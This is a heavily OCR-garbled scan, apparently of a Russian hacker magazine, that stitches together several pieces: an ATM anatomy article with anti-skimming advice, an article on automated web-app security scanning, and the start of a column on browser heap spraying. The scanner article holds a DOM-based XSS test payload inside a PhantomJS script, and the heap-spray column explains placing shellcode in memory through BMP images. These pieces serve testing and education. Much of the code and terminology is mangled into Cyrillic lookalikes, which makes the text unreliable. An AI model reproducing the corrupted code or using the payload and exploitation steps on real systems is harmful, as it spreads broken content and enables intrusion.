банкомата в поле зрения клиента. Однако 
не все зеркала одинаково полезны, некоторые 





Камера. Габаритами сравнима с батарейками типоразмера С 
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из них отражают конфиденциальную инфор- 
мацию, например в зеркальном потолке можно 
увидеть вводимую в клавиатуру информацию, 
в том числе РІМ. 

Помимо уже перечисленных мини-мо- 
нитора, клавиатуры и слота картридера, 
на лицевой панели банкомата расположен 
пользовательский монитор. Сейчас он все 
чаще оснащается сенсорным стеклом, то есть 
операции можно выбирать на экране нажа- 
тиями на определенные активные области. 

Но немало еще АТМ, где по бокам от монитора 
расположены функциональные клавиши. Их 
по четыре штуки справа и слева; такие количе- 
ство и расположение связано с особенностями 
управляющего протокола, по которому работа- 
ют банкоматы. Отдельные модели банкоматов 
оснащаются мониторным конфиденциальным 
фильтром, который существенно уменьшает 
угол обзора и не позволяет подсмотреть дан- 
ные на экране. 

ПРИНТЕР ЧЕКОВЫЙ 

На лицевой панели расположен и слот 
чекового принтера, сам же принтер нахо- 
дится внутри, в сервисной зоне. Назначение 
устройства понятно из названия — пе- 
чать клиентских и инкассаторских чеков. 
Принтер оснащен ножом для отрезания 
чека; некоторые модели способны «вы- 
плюнуть» забытый чек, а часть принтеров 
умеет забирать назад забытые чеки и скиды- 
вать их внутрь банкомата. Принтер обычно 
работает по принципу термопечати. Такая 
технология позволяет увеличить скорость 



печати и сделать ее практически бесшумной. 
Изредка встречаются матричные принтеры; 
они более шумные и медленные, но печатают 
на любой бумаге, в то время как термоприн- 
тер способен работать только с термолентой. 
У чеков, полученных на термопринтерах, есть 
один существенный недостаток — недолго- 
вечность. Обычно срок читабельности таких 
чеков не превышает полгода, впоследствии 
информация выгорает полностью. Поэтому 
для печати информации, предназначенной 
для долгосрочного хранения, обычно исполь- 
зуют матричные принтеры. 

Иногда встречаются банкоматы, оснащен- 
ные широкоформатными принтерами, с по- 
мощью которых можно получить, например, 
счет-выписку по карте. 

ДИСПЕНСЕР — ГДЕ ДЕНЬГИ ЛЕЖАТ* 

Все банкоматы, выдающие наличные (СазЬ 
Оиі), обязательно оснащены диспенсером. 
Устройство состоит из нескольких частей, 
каждая из которых отвечает за определен- 
ную часть процесса выдачи денег. Можно 
выделить презентер («лапа», подающая 
деньги), пик-модуль или фид-модуль (слот 
для вставки кассеты), собственно кассеты, 
транспортные пути (по которым подаются 
деньги), датчики (контролирующие движение 
денег), контроллер (плата обработки команд 
и хранения параметров) и шаттер (шторка, 
из-за которой выдаются деньги). Деньги 
укладываются в вандалоустойчивые кассеты 
(обычно четыре штуки, реже пять) вместимо- 
стью две-три тысячи банкнот и запираются 



ВЫРЕЖИ И СОХРАНИ! 



• Старайся использовать банкоматы, 
расположенные внутри отделений банка или 
в крупных торговых центрах. Агрегат должен 
быть хорошо освещен: так плохим парням 
сложнее установить на него свои штучки, 

а тебе проще их заметить. 

• Часто наличие скимминговой накладки можно 
определить визуально — просто смотри 
внимательно на банкомат; не пользуйся 

им, если видишь подозрительные щели, 
неровности, наклейки, а по возможности 
позвони в банк и сообщи о своих подозрениях. 

• Осмотри банкомат на предмет установки 
нештатных скрытых камер, которые 
направлены на клавиатуру. Обрати внимание 
на клавиатуру: если видишь подозрительные 
утолщения, неровности, щели — см. выше :). 

• Прикрывай свободной рукой ввод РІМ-кода 
всегда, даже если банкомат не кажется тебе 
подозрительным. 

• По возможности не пользуйся банкоматами, 
расположенными рядом с зеркальными 
поверхностями или под ними. Если 

же ты все-таки решил воспользоваться таким 



устройством, то убедись, что рядом никого нет, 
и не забудь о предыдущем совете. 

• Стандартный тайм-аут на изъятие денег — 

30 секунд. Если не успеешь забрать 
наличность, то она будет задержана, после чего 
придется разбираться с банком, что не всегда 
приятно. То же самое произойдет и с картой, 
если ты не успеешь забрать ее за 30 секунд. 

• Если тебе нужно сохранить термочек, убери его 
в темное прохладное место, например между 
страниц книги; а еще лучше сразу сделай 
ксерокопию или скан. 

• Если же несчастье все-таки произошло и твою 
карту «угнали» — срочно звони в банк и требуй 
немедленно заблокировать карту! Чем раньше 
ты сделаешь это, тем больше шансов сохранить 
деньги. Аналогично нужно вести себя, если 
карта застряла в банкомате. 

• Самое главное: не держи на карте много денег, 
пусть там будет денежка на «карманные 
расходы». Используй для хранения 

счет, а нужные суммы переводи перед 
планируемыми покупками, так ты сможешь 
оставить мошенников с носом :). 




Кик-сенсор — датчик, реагирующий на удары по банкомату 

на особый замок. Доступ к деньгам извне 
при закрытой кассете невозможен. В отдель- 
ную кассету сбрасываются забытые и от- 
бракованные банкноты. По команде купюры 
набираются в кассетах заданным количе- 
ством, по транспортным путям перемещаются 
в презентер и выдаются пачкой через щель 
шаттера клиенту. 

СЕЙФ 

Устройства, принимающие или выдающие 
деньги, надежно спрятаны в бетонно-сталь- 
ном «пироге» с двумя замками — ключевым 
(обычно сувальдным) и кодовым (лимбовым 
или электронным) — в сейфе, имеющем 1-3-й 
класс устойчивости к взлому. 

АТМ БЕЗОПАСЕН! 

Безопасным его делают средства антиским- 
минговой «обороны» и защиты от подгляды- 
ваний. Неотъемлемой частью стали скрытые 
камеры внутри банкомата, записи с которых 
хранятся на жестких дисках. Количество 
и расположение камер зависит от выбора 
банка-эквайера (эквайер — банк, обслужи- 
вающий кардхолдеров путем предоставления 
банкоматов, терминалов и прочего). Фраг- 
менты записей обычно также передаются 
в режиме онлайн в спецотделы банка. 

Видеонаблюдение внутри устройства, 
как правило, дополняется внешними ка- 
мерами — их устанавливают в помещении, 
где расположен банкомат. Сейчас банки 
все чаще используют 6Р5-маячки, которые 
позволяют отследить перемещения банко- 
мата, если его все-таки похитили с места 
установки. Но сделать это не так-то просто: 
устройство весит от 600 до 1500 килограм- 
мов и крепится к полу помещения мощными 
анкерными болтами. 

ВМЕСТО ЗАКЛЮЧЕНИЯ 

Сегодня ты узнал, как устроен банкомат, 
и познакомился с принципами его работы. 
Конечно, это лишь малая часть того, что я могу 
тебе рассказать о сложном и увлекательном 
мире АТМ. Но, вооружившись полученными 
знаниями, ты без труда сможешь опознать 
опасный банкомат, а также поддержать беседу 
со знакомым банкоматчиком ;). 

Всего тебе самого безопасного! ^ 
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богатый внутренний мир 



Именно за ней прячется кабинет. 



Основные работники — системник, ИБП, картридер, 
принтер, криптоклавиатура и сканер. 



т 










СИСТЕМНЫМ БЛОК 

В обычном системнике «крутятся 
диски» с прикладным софтом, 
который обеспечивает работу 
банкомата. ИБП ее обеспечивает 
с другой стороны — когда в розетке 
заканчивается электричество. 

СПЕЦЭЛЕКТРОНИКА 

Куча датчиков и индикаторов 
работают при помощи блока 
специальной электроники. 

Именно благодаря этому устройству 
банкомат призывно подмигивает, 
предлагая вставить карту. 

ПРИНТЕР 

Обычно принтер печатает и выдает 
чеки. Если чек не забрали, то может 
«выплюнуть» его или «проглотить», 
освободив место для следующего. 



КАРТРИДЕР 

Умеет читать карты. Именно на него 
часто «нападают» похитители 
карточных данных. 





МОНИТОР 

Что такое монитор? 

Правильно, это устройство вывода 
информации. Но банкоматные 
мониторы особенные — часть 
из них ІіоисЬ, а на остальных 
по бокам расположены функцио- 
нальные клавиши, поэтому монитор 
одновременно и устройство ввода. 










КРИПТОКЛАВИАТУРА 

Здесь творится особая 
магия — внутри шифруется 
РІМ-блок, идентифицирующий 
клиента на хосте в банке. 



ШАТТЕР 

Шторка, которая открывается 
при выдаче. 









1 //'^ 

і /ІИ /Ш/ Г 




Обычный диспенсер содержит одну кассету для 
брака и четыре денежных кассеты. Этот — умный, 
у него есть дополнительная кассета для популярного 
номинала. В каждую кассету загружается один 
номинал, какой именно — решает банк-эквайер. 



КАССЕТА для БРАКА 

Сюда попадают отбракованные 
и забытые деньги (каждые 
в свой отсек), тестовые банкноты 
(проверка диспенсера) и любые 
другие, которые кажутся 
банкомату неправильными. 



8 ^ 












КАССЕТА 

Без ключа внутрь просто так 
не попасть — денежная кассета 
обычно изготавливается 
из антивандального пластика 
и не имеет «лишних» отверстий. 
В одну такую кассету помещается 
до 3000 листов (банкнот). 

Каретка нежно, но крепко 
удерживает банкноты. 








взлом 



Тарас Иващенко, администратор информационной безопасности в Яндексе (охсіе^йуапсіех-іеапп.ги, охсіеііп^о) 




)^АВЫ1МС 



Вся информация предоставлена исключи- 
тельно в ознакомительных целях. Ни ре- 
дакция, ни автор не несут ответственности 
за любой возможный вред, причиненный 
материалами данной статьи. 




АВТОМАТИЗИРОВАННЫЙ АУДИТ ВЕБ-ПРИЛОЖЕНИЙ 

Веб-приложения становятся одной из основных частей «цифровой жизни» современного человека. 
Кажется, что еще чуть-чуть и мы вовсе забудем о традиционных приложениях — останется только смесь 
из веб-браузера и операционной системы. Уже сейчас веб-аналоги заменили большинство десктопных 
приложений: кино и ТВ, почта, чат, игры, социальные сети. Сточки зрения безопасности это несет 
множество проблем для автоматизированного тестирования. Рассмотрим некоторые из них и попробуем 
найти решения. 



ПРОБЛЕМЫ 

Как я уже отметил, за последние годы все, что связано с вебом, 
шагнуло очень далеко вперед, а веб-браузеры становятся, по сути, 
главными десктоп-приложениями. В то же время сканеры безопас- 
ности веб-приложений развиваются не так быстро. 

На текущий момент процесс сканирования веб-приложения 
классическим сканером включает в себя следующие фазы: 

• Аутентификация в тестируемом веб-приложении. Обычно 

это один или несколько НТТР-запросов (так называемая логин- 
последовательность), отправка приложению которых приводит 
к созданию полноценной пользовательской сессии. Например, 
в простейшем случае это может быть Р05Т-запрос с именем 
пользователя и паролем на ІІРІ вида Ьир://ехатр1е.сопп/ 
аиіЬ.рЬр. 

• Кровлинг (англ, сгаѵѵііпд). По сути, это обход с определенной 
глубиной «пауком» веб-приложения и сбор всех сущностей, 
которые могут генерировать НТТР-запросы: ссылки, формы, 
подключение скриптов и так далее. 

• Фаззинг (англ. І^иггіпд) — тот самый этап, на котором сканер 
и шлет большое количество НТТР-запросов с магической 
нагрузкой, анализирует ответы веб-сервера и пытается опре- 
делить наличие Х55, 50Ы )здесь и далее Х55, 50Ы считаем 
уязвимостями, а не атаками) и прочих уязвимостей. 



• Отчет — наверное, самая простая фаза, когда сканер генериру- 
ет в необходимом формате отчет для пользователя. 

К несчастью, когда имеешь дело с современным веб- 
приложением, у обычного сканера «обламываются зубы» при по- 
пытке найти в нем уязвимости. Проблемы начинаются уже на пер- 
вом этапе кровлинга. Когда сканер запрашивает веб-страницу, 
он надеется получить в итоге пусть и не «валидный», но все-таки 
преимущественно НТМІ с примесью ^аѵа5сгір^ и С55. Затем 
со страницы аккуратно выдираются ссылки, формы и тому по- 
добное. Но в мире Веб 2.0 іпбех.ЫтІ уже давно не торт! Сейчас это 
уже скорее мясо из ОаѵаЗсгірІ с легкой окантовкой из НТМІ (в том 
числе и для того, чтобы сообщить параноику-пользователю о не- 
обходимости включить ОаѵаЗсгірі). Посмотрите на НТМІ-исходник 
любого популярного социального сервиса и убедитесь в этом. Весь 
пользовательский интерфейс строится сейчас на клиенте. Сканер 



Г ^ 

Аи(ИогІ2а(іоп 




^ л 

Сгаѵѵііпд 
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г ^ 

Риггіпд 




^ л 
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Рис. 1. Схема работы классического сканера уязвимостей 
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Робот для Веб 2.0 
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Рис. 2. Примерно такой браузер встроен в большинство сканеров 



Рис. 3. іиег во всей красе 



в НТТР-ответе не видит никаких ссылок, форм. Кровлинг проходит 
практически безрезультатно. А все потому, что в то время, как веб- 
браузеры эволюционировали от таких представителей, как Іупх 
и Моваіс, до монстров Рігеі^ох и СЬготе, большинство сканеров 
по своим возможностям внутри остались на уровне текстовых 
браузеров. 

Другой блок проблем — это коммуникация между веб-клиентом 
и веб-сервером. Конечно, как и в эре 1.0, это до сих пор в большин- 
стве случаев делается с помощью стандартных 6ЕТ/Р05Т-запросов. 
В то же время приходится учитывать и такие моменты: 

• В каком виде данные путешествуют между сторонами? В виде 
6ЕТ-параметров? Как Р05Т-нагрузка? 

• Аможет, мы имеем делосХМЕ- или 05ОМ-данными? 

• А как насчет поддержки веб-сокетов? 

И наконец, конечно же, обычный сканер мало что может 
предпринять для поиска чисто клиентских проблем, например 
ООМ-Ьазеб Х55. Да, разработчики сканеров пытаются выкрутиться 
из положения и используют «умный» поиск сигнатур возможной 
уязвимости в ^аѵа5сгірЕ Но все же очевидно, что для их детекти- 
рования сканеру необходим полноценный встроенный ^аѵа5сгір^ 
движок, равно как и другие браузерные технологии. И это очень 
непростая задача для разработчиков. 

СРАВНЕНИЕ СКАНЕРОВІ 

УЯЗВИМОСТЕЙ ВЕБ-ПРИЛОЖЕНИЙ 

Для того чтобы выяснить текущее положение с поддержкой со- 
временных веб-технологий в сканерах уязвимостей, я подготовил 
(ну хорошо, взял старое и переделал в духе Веб 2.0) специальное 
тестовое веб-приложение под названием Іиег. Да-да, это сервис 
микроблогов, и я надеюсь, что он станет таким же популярным, 
как и его практически однофамилец :). Тестовое приложение об- 
ладает следующими характеристиками: 

• ЕАМР(ипих-АрасЬе-Му5аі-РНР); 

• поиск, личные сообщения, за кладки; 

• пользовательская частьза аутентификацией; 



• использование АОАХ(например, для за кладок); 

• ну конечно же, тут есть уязви мости;). 

Затем я отправился на всем известный сайт зесіооіз.огд и взял 
несколько сканеров из секции ѴѴеЬ Бсаппегз. Выбор делался на ос- 
нове следующих критериев: 

• встроенный модуль кровлинга (поэтой причинеутилиты вроде 
«старого лампового» пікіо не попали в выборку); 

• в случае с коммерческими продуктами доступная демо- или три- 
ал-версия. 

Результаты тестирования были, вообще говоря, предсказуемыми. 
Очень небольшое количество сканеров из протестированных име- 
ют хоть какую-нибудь поддержку А^АX-теxнологий. 0. Е. 0. Теперь 
давай обсудим возможные пути и просто «костыли» для решения 
этих сложных задач. 

РЕШЕНИЯ 

Хорошо, мы убедились, что А^АX и вообще современные веб- 
технологии принесли немало проблем для сканеров уязвимостей. 
Эти проблемы можно разделить на две большие области: 

• сбор НТТР-трафика между клиентской и серверной частями веб- 
приложения; 

• детектирование проблем безопасности, специфичных для кли- 
ентской стороны. 

Но что у нас с возможными решениями? Попробуем разобраться 
и рассмотреть следующие варианты: 

• Специальный ^аѵа5сгір^парсердля извлечения СІРЕ-адресов 
из кусков ^аѵа5сгір^кода. 

• Классическое сканирование с подмешиванием сохраненных 
НТТР-запросов. 

• Интеграция сужесуществующими ОА-инструментами, например 
Зеіепіит. 

• Встроенный движок браузера с магией для имитации действий 
пользователя. 



Сканер 


ООМ-ЬазесІХББ 


Нашел АЗАХ-запросы 


Комментарий 


ѵѵЗаП^гипкѵегзіоп) 


Вообще-то нет, но есть специальный дгер-плагин для поис- 
ка опасныхучастков ЗаѵаБсгірІ-кода, втом числе и сІотХББ 


Нет 




ЗкірЛзЬ (2.05Ь-1) 


Нет 


Нет 


Поддержка ЗаѵаЗсгірІ в ТООО 


ѵѵарііі (1.1.6) 


Нет 


Нет 




ВигрРгоху(1.4.01) 


Нет 


Нет 


Протестирован Зрісіегиз бесплатной версии 


2арРгоху (1.3.2) 


Нет 


Нет 


Использовалисьзрісіег+аиаскппосіиіез 


АсипеІіх(б.О) 


Да 


Да 


УАкунетиксаестьтехнология под названием 
С5А(и возможность использовать модуль М5 
ІЕ как встроенный браузер) 
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• Специально подготовленный АРІ веб-приложения для взаимо- 
действия сосканером. 

Первый вариант представляет по сути своей ^аѵа5сгір^парсер 
(обычно реализованный с помощью механизма регулярных вы- 
ражений) для поиска опасных участков кода и извлечения ценной 
информации вроде тех же СІРІ-адресов. Недостаток такого вари- 
анта очевиден — это в любом случае не полноценный ^аѵа5сгір^ 
движок, а значит, толку от него в силу событийной природы языка 
будет не много. 

Второй вариант проще. Ведь и правда можно предположить, 
что нам удалось откуда-то достать НТТР-транзакции тестово- 
го веб-приложения (например, распарсить логи веб-сервера) 
и их можно импортировать в сканер для дальнейшего фаззинга. 
Ауж функция импорта есть сейчас практически во всех сканерах! 
Но мало того что необходимо специальное окружение для ре- 
гулярных сканирований. Этот вариант не годится еще и потому, 
что не умеет детектировать клиентские уязвимости. Да и вообще 
выглядитуж сильно ограниченно. 

Кроме тестирования безопасности, веб-приложения нуждают- 
ся и в обычном функциональном тестировании. А это значит, что 
у тестировщиков уже наверняка есть инструменты для автомати- 
зации этого процесса в рамках 501С. Одно из самых популярных 
решений для функционального тестирования интерфейсов веб- 
приложений — это Зеіепіиіті. Логичный вопрос — можем ли ис- 
пользовать его для тестирования безопасности веб-приложения? 
Для начала можно сделать единый прокси и проводить через него 
весь трафик от тестировщиков :). Таким образом мы заполучим 
так необходимые сканеру НТТР-запросы веб-приложения. Но, имея 
только трафик, мы столкнемся с теми же проблемами других ва- 
риантов, что рассмотрены выше. Существуют также исследования 
на тему использования Селениума напрямую для проверок без- 
опасности (например, Ьі1Іу.сопп/0996Х5 и зІісІезЬа.ге/РрбВі? ). 

Четвертый вариант предусматривает наличие встроенного 
движка современного веб-браузера (например, МісгозоЙ ІЕ или 
ѴѴеЬКіі) плюс полноценный ЭаѵаЗсгірІ-движок. На этом варианте 
мы остановимся чуть подробнее далее. 

И немного слов о последнем варианте. Мы можем предста- 
вить серверную часть современного веб-приложения как набор 
АРІ-методов, доступных по НТТР-протоколу. Таким образом, если 
мы рассматриваем автоматизированное сканирование как часть 
цикла разработки ПО, то мы можем договориться с разработчи- 
ками о том, чтобы предоставить сканеру специальный манифест, 
описывающий этот АРІ. Внимательный читатель сразу вспомнит 
про ѴѴ501-файлы в технологии 50АР. Сканер может забирать такой 
манифест и фаззить методы из него. 

ѴѴЕВ205РІРЕР 

Мы пришли ктому, что если сканеру придется иметь дело 
не только с «домашними страницами», но и с современными веб- 
приложениями, то ему не обойтись без полноценного стека брау- 
зерных технологий. Схема работы такого сканера может выглядеть 
следующим образом. 

Вначале сканер проходит аутентификацию в тестируемом 
веб-приложении и получает сессионные куки. На этапе кров- 
линга он подключает модуль веб-браузера и взаимодействует 
с веб-приложением уже с помощью его. При этом модуль браузера 
шлет через прокси-модуль сканера весь трафик веб-приложения. 
Действия сканера на стороне браузера (такой «Веб 2.0 кров- 
линг» получается) разберем более подробно. В случае с АЭАХ- 
приложением НТТР-запрос к серверной части может быть послан 
практически при любом действии (или бездействии) пользо- 
вателя. У веб-приложения больше нет страниц в привычном 
их понимании, но есть состояния. Веб-приложение (клиентская 
часть) может переходить из одного состояния в другое по клику 
на ссылке (или любом другом объекте) либо при возникновении 
любого другого события в рамках ЭаѵаВсгірЕ Например, пользо- 



Рис. 4. Карта запросов к ІИег, сделанная ѵѵЗа^ 





Л ІІРІ, Соокіез, 5сгір^ Г 

Вгоѵѵзег г< Бсаппег 

у V . __ 




А П 

РиігаЫе 

Редиез^з 




Г л л 

ѴѴеЬ Арр ►! Ргоху 

^ ГГу НТТРТгапзасІіопз V 





Рис. 5.ѴѴеЬ205рісІег 

ватель кликнул на ссылку «Настройки», и ему без перезагрузки 
основной страницы показывается форма с настройками, которая 
также без перезагрузки и отправляется на сервер для обработки. 
Таким образом, задача в рамках этапа кровлинга из «собрать все 
ссылки» превращается в «собрать максимально полную карту со- 
стояний веб-приложения». Для упрощения этой, вообще говоря, 
сложной задачи будем считать, что ІІРІ однозначно идентифици- 
рует состояние веб-приложения. Например, для экрана «Настрой- 
ки» ІІРІ может выглядеть как Ьир://ехатрІе.сопп/арр/#5еиіпд5. 

После открытия в модуле браузера «главной страницы» 
веб-приложения мы можем попросить его найти и прокликать 
все объекты, которые могут быть источниками смены состояния, 
например те же ссылки (тег а) или картинки (тег ітд). Запомнить 
все новые состояния, которые получились после клика для сле- 
дующей итерации. Затем проходим подобным образом по всем 
собранным состояниям (количество итераций, оно же глубина 
обхода, конечно, регулируется). Напоминаю, что весь трафик 
при этом проходит через сканер и сохраняется для дальнейшего 
фаззинга. 

Конечно, можно в качестве модуля браузера использовать 
в «сыром» виде соответствующий движок — Сеско, ѴѴеЬКіЕ.. 

Но эта задача будет равна, по сути, написанию своего еще одного 
браузера, которых на том же ѴѴеЬКіІ сейчас великое множество. 

Но есть вариант интереснее и проще — а что, если использовать 
полноценный веб-браузер без «иксов», да еще и с возможностью 
скриптинга на ЗаѵаЗсгірІ?! Вот, например, РЬапІотЗЗ, который 
уже пользуется популярностью у разработчиков и тестировщи- 
ков. Это полный стек браузерных технологий на базе ѴѴеЬКіІ, 
которым можно управлять через скриптинг на ЗаѵаЗсгірІ и даже 
СоІ'І'ееЗсгірЕ Также важным фактором является то, что, как и дви- 
жок, это свободный (Меѵѵ В50 Ысепзе) проект. 

Например, в следующем участке кода мы открываем необходи- 
мую страницу и можем выполнять с ней практически все что угодно 
в контексте ее домена. 

сопБОІе. 1о§( ' ІоасІіп§ а ыеЬ ра§е'); 
ѵаг ра^е = гедиіге( 'ыеЬра§е' ) .сгеа1:е(); 
ѵаг игі = ' Іі1;1;р ://ыыы.рІіап1;отд5 .ог§/ ' ; 



ра^е.ореп(иг1. -рцпсіііоп (5 І:а1:и5) { 
рІіапІіот.ехіІіП : //Ра ^е І5 ІоасІесІ! 

11 ; 

А вот так можно сделать простую, но тем не менее «натураль- 
ную» проверку ООМ-ЬазесІ Х55: 

ѵаг ра^е = пе^ ІлІеЬРа^еП; 

ѵаг игі = "Іі1;1;р://ехатр1е.сот/-Роо.рІір"; 
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Робот для Веб 2.0 





Са5рег.]5 




Рис. 6. Логотип РЬап^от^5 Рис. 7. Логотип Са5рег^5 Рис. 8 .Логотип ѵѵЗаІ 



ѵаг Ііокеп = 'х55 ' : 

рауі оасі = ' ?"><5сгір1:>сІоситеп1; .1;і1;1е=51;гіп§. 



;РготСІіагСосІе( ' + 5І;г2а5сіі(1;океп) + ' )</5сгір1;> ' ; 

игі = игі + рауіоасі: 

ра§е.ореп(иг1^ 
і-р (5І:а1:и5 !== 



(5І:а1;и5) { 
'5иССѲ55'^ { 



сопБОІе. 1о§( 'ІІпаЫе 1;о ІоасІ 1;Ііе асІсІгезБ ! ' ) ; 
рбаітІіот.ехіІіП : 



1;і1;1е = ра§е.еѵа1иа1:е( 
геііигп сІоситеп1:.1:і1:1е: 



О { 



-Лх- 



(1:і1:1е == Ііокеп) { 



сопБОІе. 1о§( '00М-Ьа5есІ Х55 І5 -РоипсІ іп\пІІКІ: 
игі) ; 



} 

рІіап1:от.ехі1:П ; 



ж_ 



Все очень просто. В нагрузке пытаемся изменить какой-нибудь 
ООМ-объект и потом проверяем изменения. В данном случае меня- 
ем боситепІ.ООе. 

Но использовать в чистом виде РЬапІотОВ может оказаться 
для специфичных задач все же не так удобно, как хотелось бы. 

В таком случае рекомендую обратить внимание на другой проект — 
Са5рег^5, который, по сути, является надстройкой над РЬап^опп^5 
и дает, как любят говорить программисты, больше «синтаксическо- 
го сахара» и удобства скриптинга на все том же ^аѵа5сгір^. 

Описанный выше алгоритм обхода состояний веб-приложения, 
реализованный для РЬап^опп^5/Са5рег^5, будет иметь следующий 
вид: 



//... 



ргосе55_ра§е = -Рипсіііоп П { 



ѵаг игі; 

і-р (ІІ0 ѴІ5І1: . Іеп^іііі > 



0ІХ- 



игі = 1іо_ѵІ5І1:.рорО : 



5І:а1:е5.ри5Іі(иг1) 

} е 56 { 



геііигп: 



X 



ІІІ1І5 .1іІіепОреп(иг1. -Рипсіііоп П { 



ѵаг 1іпк5 = 1І1І5 .еѵа1иа1іе(§е1іС1іскаЫе') : 
-Рог (ѵаг і = 0: і < Ііпкз . Іепдіііі : і+ч-) { 



і-р (1:ІіІ5.ехІ5Іі5(1 іп к 5[і] . раіііі) ^ { 



і-р ( іпеесі -Роііоы и г1(1іпк5[і] .Ііге-Р)) { 

сопіііпие: 

-} 

ІІІ1І5 .1іІіепС1іск(1іпк5[і] . раііі) .ІіІіепР-РипсІііоп П { 

ІІ1І5 .ыаі1і(30Ѳ. -Рипсііоп () { 

ѵаг 1ітр_иг1 = іІіІ5 .^еІіСиггепІіигІП : 

і-р (игі !== ітр игі’) I 



І1^ (§е1 і_сІопіаіп(1іпір_и г1) == іаг§е1і_сІотаіп) { 



І1^ (5Ііа1іе5.іп(іІехО-Р(1ітр_иг1^ == -1^ I 



1іо_ѵІ5І1і.ри5Іі(1ітр_иг1) 



ІІ1І5 . ЬаскП ; 



XX 



Хі 



} 

XX 



X 



1^ог (ѵаг і = 0; і <= тах сіеер; і++) I 



са5 рег.1іІіеп(ргосе55_ра?е) ; 

} 

/X. 



Немного комментариев по коду. Массив Іо_ѵізіІ содержит ОРІ- 
адреса, которые необходимо будет учесть при следующей итера- 
ции. А зіаіез, соответственно, адреса уже обработанных состояний. 
Количество итераций есть глубина анализа веб-приложения 
и задается переменной тах_сІеер. Функция пеесІ_^оІІоѵѵ_игІ не- 
обходима для того, чтобы наш «паук» не уходил за пределы домена 
тестируемого веб-приложения. Напоминаю, что мы рассматриваем 
все-таки скорее РоС, чем рабочий вариант, и поэтому считаем, 
что НТТР-запросы могут генерировать элементы а и ітд. Для абсо- 
лютной адресации этих элементов я использовал С55-селекторы, 
хотя кому-то будут больше по душе ХРАТН. 

Ну и наконец мы подошли к самому сканеру и прокси- 
модулю. В рамках данного исследования в качестве сканера 
был выбран ѵѵЗаР Для тех, кто не знает: это достаточно мощный 
опенсорсный модульный сканер. Эдакий Метасплоит для веба. 
Написан он на Питоне, а буква Р в названии расшифровывается 
как фреймфорк (ѴѴеЬ Арріісаііоп Аиаск апб Аисііі Ргатеѵѵогк) — 
в общем, достаточно легко можно писать для ѵѵЗа^ свои модули. 

В нашем случае был написан РоС сіізсоѵегу-модуль ѵѵеЬ205рісІег 
[ Ыиу/5Ц7сс2 ]. который как раз и запускал при сканировании 
РЬапІотЗЗ со специальной 35-нагрузкой. Трафик при этом 
проксируется через другой модуль ѵѵЗаІ" и в дальнейшем на этапе 
аудита используется для всестороннего фаззинга. В итоге 
получилось достаточно интересное решение, которое позволяет 
уже не с таким ужасом в глазах смотреть на тестирование, 
в том числе и автоматизированное, современных веб- 
приложений. А с учетом того, что у нас есть полноценный браузер 
и возможность запуска произвольного 35-кода в контексте 
тестируемого домена, мы вполне можем поискать клиентские 



уязвимости 



ЗАКЛЮЧЕНИЕ 



Современные веб-приложения принесли не только скорость ра- 
боты интерфейса и прочие удобства для конечного пользователя 
и веб-разработчиков, но и порядочно головной боли для разра- 
ботчиков сканеров уязвимостей. Полноценно тестировать такие 
приложения доступно далеко не всякому сканеру, и зачастую 
это дорогие коммерческие разработки. Более того, это еще и хо- 
рошая тема для академического исследования! В этой статье 
я попытался показать, каким образом эти проблемы можно 
решать и что за теми сканерами, которые сумеют это сделать, 
будущее. Удел же остальных будет сканировать старые ламповые 
веб-странички :). ^ 



• «Іпѵагіапі-Вазесі АиІотаІісТезІіпд оТ Мосіегп ѴѴеЬ Арріісаііопз» ЬуАІі МевЬаЬ, 
Агіе ѵап Оеигзеп апсі апсі Оаппу Роезі, ЬіІ.Іу/іСхСсІ 

• «СЬаІІепдез іп ІНе Аиіотаіесі Тезііпд оТ Мосіегп ѴѴеЬ Арріісаііопз» Ьу ЫаІНап 
НатіеІ, Огедогу РІеізсЬег, 5еІН Іаѵѵ агкі іизііп Епдіег, Ьі1.Іу/Тх538І 
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Новыетрюки 

для НЕАР5РЛАУ 

КАК НТМ15 ДЕЛАЕТ НА11ІУ ЖИЗНЬ ПРОЩЕ (СЛОЖНЕЕ?) 



Трудно не заметить, что в наше время очень многие занимаются секурити-темой. Очевидно, что эта движуха 
уже вышла за рамки андерграудного угара (хотя и там еще полно молодцов) и хлещет новыми темами и фи- 
чами, но уже по-взрослому — теперь это называется исследованиями. В связи с чем ваш покорный слуга, 
с позволения доблестной редакции, решил завести колонку, где будет освещать такие вот телодвижения 
сцены, а также излагать свои скромные мысли по этому поводу. 



НЕАР5РКАУ НАНТМЦ5 

При создании эксплойтов для браузера или его плагинов часто 
возникает необходимость выполнить так называемые Неар 
5ргау. Эта техника позволяет заполнить память процесса за- 
ранее подготовленными данными, чтобы при эксплуатации 
уязвимости их можно было использовать. Например, там можно 
расположить сам шелл-код и после атаки выполнить переход 
на него (Неар 5ргау дает возможность заполнить память так, 
что мы можем предположить то место в памяти, где шелл-код 
будет находиться). Кроме того, эта техника используется для 
эксплуатации таких уязвимостей, как Неар ОѵегЛоѵѵ и ІІзе- 
аЙег-І'гее. Последние лет десять для этой техники использова- 
ли обыкновенный ^аѵа5сгірк Грубо говоря, просто создавали 
большой массив строк в памяти. Но разработчики браузеров, 
а также ОС (мы говорим о МісгозоЙ) не дремлют и придумывают 
различные хитрости, чтобы помешать нам заполнять память 
своими данными. В этом году на конференции ЕиВесѴѴезІ ис- 
следователи Федерико Муттис и Энибал Сакко опубликовали 
еще пару вариантов организации Неар 5ргау без использования 
^5-строк. На самом деле одна из представленных идей давно 
уже на вооружении у баг-хантеров, но теперь она официально 
опубликована, так что о ней мы и поговорим... 

ИДЕЯ 

Идея любого Неар 5ргау проста — сделать так, чтобы память 
быстро наполнилась данными, которые контролирует атакую- 
щий. Если раньше этого добивались, создавая большие массивы 
со строками в ^аѵа5сгір^ или даже АсІіопЗсгірС то теперь нужно 



быть хитрее. Очевидно, чтобы заспамить память, много ума не надо, 
но нужно сделать это так, чтобы еще и работало быстро. Так, одной 
из идей было использование ВМР-картинок, которые бы подгружа- 
лись в браузер. Что логично, содержимое ВМР — шелл-код. Если 
таких картинок грузить много, то они будут располагаться в памяти 
одна за другой, таким образом реализуя Неар Вргау. Только есть 
одна проблема: по сети это может занять какое-то время, а атака, 
которая идет более 20 секунд, — не хорошая атака, а длительная 
и палевная. При этом размер картинки тоже должен быть правиль- 
ным: слишком маленькая — долго спамить, слишком большая — 
будут «просветы» при заполнении (то есть блоки будут сидеть 
в памяти неплотно, что снижает вероятность «угадывания»). По- 
этому картинка должна быть равна размеру выделяемой страницы, 
например 0 х 00010000. С учетом заголовка кучи и заголовка ВМР 
это позволит нам сточностью до байта предсказывать значения 
наших данных по выбранному адресу памяти. 

НТМ15 

Теперь вернемся к нашим исследователям. Какуже было сказано, 
